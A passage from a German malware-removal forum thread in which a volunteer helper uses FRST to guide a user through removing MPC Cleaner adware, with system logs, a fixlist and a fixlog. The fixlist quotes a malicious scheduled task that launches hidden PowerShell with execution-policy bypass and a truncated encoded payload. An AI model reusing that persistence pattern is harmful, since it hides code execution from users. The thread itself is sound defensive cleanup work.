Verfügbarer physikalischer RAM: 6330.54 MB
Summe virtueller Speicher: 16877.24 MB
Verfügbarer virtueller Speicher: 14674.41 MB

==================== Laufwerke ================================

Drive a: (Harun) (Fixed) (Total:931.51 GB) (Free:774.43 GB) NTFS
Drive c: (Windows) (Fixed) (Total:59.09 GB) (Free:13.59 GB) NTFS

==================== MBR & Partitionstabelle ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 59.6 GB) (Disk ID: D9E74E88)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=59.1 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=450 MB) - (Type=27)

========================================================
Disk: 1 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: 4D282A8D)
Partition 1: (Not Active) - (Size=931.5 GB) - (Type=07 NTFS)

==================== Ende von Addition.txt ============================

Alt 19.04.2016, 19:14   #13
cosinus
/// Winkelfunktion
/// TB-Süch-Tiger™
 
Windows 10 : MPC Cleaner lässt sich nicht richtig entfernen - Standard

Windows 10 : MPC Cleaner lässt sich nicht richtig entfernen


FRST-Fix

Virenscanner jetzt bitte komplett deaktivieren, damit sichergestellt ist, dass der Fix sauber durchläuft!

Drücke bitte die Windowstaste + R Taste und schreibe notepad in das Ausführen Fenster.

Kopiere nun folgenden Text aus der Code-Box in das leere Textdokument

Code:
ATTFilter
Task: {04C44956-D7CD-4939-8F45-2FF07606F6B9} - System32\Tasks\bvxvcxxvaf => C:\Users\Harun\AppData\Local\bvxvcxxvaf\bvxvcxxvaf.exe <==== ACHTUNG
Task: {113ED8FC-24C5-4F57-AF03-B5534E316C7D} - System32\Tasks\{0E0B0E47-0D04-0808-0E11-0D0B0479110F} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand OwAkAEUAcgByAG8AcgBBAGMAdABpAG8AbgBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AIgBzAHQAbwBwACIAOwAkAHMAYwA9ACIAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAiADsAJABXAGEAcgBuAGkAbgBnAFAAcgBlAGYAZQByAGUAbgBjAGUAPQAkAHMAYwA7ACQAUAByAG8A (Der Dateneintrag hat 9596 mehr Zeichen). <==== ACHTUNG
Task: {A0FF1C4C-B44D-432C-AFCB-8A38CAAB8ADC} - \Microsoft\Windows\File Classification Infrastructure\Property Definition Sync -> Keine Datei <==== ACHTUNG
C:\WINDOWS\System32\Tasks\ffgogogoCheckTask
C:\WINDOWS\System32\Tasks\ffgogogoBrowserUpdateCore
C:\WINDOWS\System32\Tasks\ffgogogoBrowserUpdateUA
C:\Users\Harun\AppData\Local\ffgogogo
C:\Users\Public\Documents\ffgogogo
C:\Users\Harun\AppData\Roaming\ffgogogo
C:\Program Files (x86)\eAHPeNhIUJ
C:\WINDOWS\System32\Tasks\eAHPeNhIUJBrowserUpdateUA
C:\WINDOWS\System32\Tasks\eAHPeNhIUJCheckTask
C:\WINDOWS\System32\Tasks\eAHPeNhIUJBrowserUpdateCore
C:\Users\Public\Documents\eAHPeNhIUJ
C:\ProgramData\eAHPeNhIUJ
C:\Users\Harun\AppData\Local\bvxvcxxvaf
emptytemp:

Speichere diese bitte als Fixlist.txt auf deinem Desktop (oder dem Verzeichnis in dem sich FRST befindet).
  • Starte nun FRST erneut und klicke den Entfernen Button.
  • Das Tool erstellt eine Fixlog.txt.
  • Poste mir deren Inhalt.

__________________
Logfiles bitte immer in CODE-Tags posten

Alt 19.04.2016, 20:30   #14
StOony
 
Windows 10 : MPC Cleaner lässt sich nicht richtig entfernen - Standard

Windows 10 : MPC Cleaner lässt sich nicht richtig entfernen


Fixlog

Code:
ATTFilter
Entferungsergebnis von Farbar Recovery Scan Tool (x64) Version:18-04-2016
durchgeführt von Harun (2016-04-19 21:29:34) Run:1
Gestartet von C:\Users\Harun\Downloads
Geladene Profile: Harun (Verfügbare Profile: Harun & aysec & faruk)
Start-Modus: Normal
==============================================

fixlist Inhalt:
*****************
Task: {04C44956-D7CD-4939-8F45-2FF07606F6B9} - System32\Tasks\bvxvcxxvaf => C:\Users\Harun\AppData\Local\bvxvcxxvaf\bvxvcxxvaf.exe <==== ACHTUNG
*****************

"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{04C44956-D7CD-4939-8F45-2FF07606F6B9}" => Schlüssel erfolgreich entfernt
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{04C44956-D7CD-4939-8F45-2FF07606F6B9}" => Schlüssel erfolgreich entfernt
C:\WINDOWS\System32\Tasks\bvxvcxxvaf => erfolgreich verschoben
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\bvxvcxxvaf" => Schlüssel erfolgreich entfernt

==== Ende von Fixlog 21:29:34 ====

Alt 19.04.2016, 23:02   #15
cosinus
/// Winkelfunktion
/// TB-Süch-Tiger™
 
Windows 10 : MPC Cleaner lässt sich nicht richtig entfernen - Standard

Windows 10 : MPC Cleaner lässt sich nicht richtig entfernen


Wiederhol den Fix. Du hast da den Text völlig unvollständig übernommen.
__________________
Logfiles bitte immer in CODE-Tags posten

Antwort
Seite 1 von 4 1 23 Letzte »

Themen zu Windows 10 : MPC Cleaner lässt sich nicht richtig entfernen
anti, avira, cleaner, computer, deinstallieren, entfernen, gesucht, information, kriege, laufen, malware, namens, ordner, programm, programme, rechts, richtig, schonmal, starte, startet, systemsteuerung, virus, win, win 10 pro, windows, öffnen


« Ordner Spacekace in C: gefunden - was kann ich tun? | Windows 10 64 Bit evtl. Funde: PUP.Optional.Desk365/PUP.Optinal.RegCleanPro/Application.AdReg/Application.AdShort »


Ähnliche Themen: Windows 10 : MPC Cleaner lässt sich nicht richtig entfernen


  1. Rechner vermutlich infiziert - Verdächtiges Verhalten, Updates funktionieren nicht, Virensoftware lässt sich nicht richtig installieren etc.
    Log-Analyse und Auswertung - 05.05.2016 (3)
  2. Win 8.1 MPC Cleaner lässt sich nicht entfernen
    Log-Analyse und Auswertung - 30.04.2016 (30)
  3. MPC Cleaner lässt sich nicht löschen (Maleware)
    Log-Analyse und Auswertung - 01.04.2016 (20)
  4. MPC Cleaner lässt sich nicht entfernen
    Plagegeister aller Art und deren Bekämpfung - 24.03.2016 (29)
  5. Windows 7: MPC Cleaner lässt sich nicht deinstallieren / entferne
    Log-Analyse und Auswertung - 22.03.2016 (20)
  6. MPC Cleaner lässt sich nicht komplett Entfernen
    Log-Analyse und Auswertung - 17.03.2016 (9)
  7. MPC Cleaner läßt sich nicht entfernen
    Log-Analyse und Auswertung - 11.03.2016 (12)
  8. Win 10: "MPC Cleaner" lässt sich nicht entfernen
    Log-Analyse und Auswertung - 11.03.2016 (1)
  9. Falsch geklickt, MPC Cleaner lässt sich nicht deinstallieren und jede Menge Popups
    Log-Analyse und Auswertung - 03.03.2016 (15)
  10. MPC Cleaner lässt sich nicht entfernen
    Log-Analyse und Auswertung - 20.01.2016 (82)
  11. MPC Cleaner lässt sich nicht entfernen
    Plagegeister aller Art und deren Bekämpfung - 07.01.2016 (2)
  12. Cleaner pro startet automatisch - Suchaschinen wurden geändert - Antivir lässt sich nicht öffnen ...
    Log-Analyse und Auswertung - 19.08.2015 (16)
  13. TR/CoinMiner.J bei Windows 8.1 lässt sich nicht entfernen.
    Log-Analyse und Auswertung - 01.06.2015 (2)
  14. TR/Matsnu.EB.137 lässt sich mit AVIRA EU Cleaner nicht entfernen
    Log-Analyse und Auswertung - 13.03.2014 (41)
  15. Spybot+Firefox hängen sich auf / Windows Security Alert lässt sich nicht entfernen
    Plagegeister aller Art und deren Bekämpfung - 11.05.2010 (15)
  16. Pc lässt sich nicht richtig runterfahren. Malware? System Neuaufsetzen nötig?
    Plagegeister aller Art und deren Bekämpfung - 19.01.2010 (7)
Anleitungen und Tipps

- Für alle Hilfesuchenden! Was beachten?

- Anleitung: MyStartSearch.com entfernen

- Anleitung: WebSearches löschen

- Hilfe: iStartSurf entfernen – so gehts!

- Anleitung: Omiga Plus richtig entfernen

- Browser Viren entfernen


Zum Thema Windows 10 : MPC Cleaner lässt sich nicht richtig entfernen - Hallo liebe Helfer, ich bin hier zum ersten mal und hoffe darauf Hilfe zu kriegen. Mein Computer ist voller Malware, glaub ich zumindest. Habe ein Programm namens MPC Cleaner der - Windows 10 : MPC Cleaner lässt sich nicht richtig entfernen...
Archiv
Du betrachtest: Windows 10 : MPC Cleaner lässt sich nicht richtig entfernen auf Trojaner-Board

Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131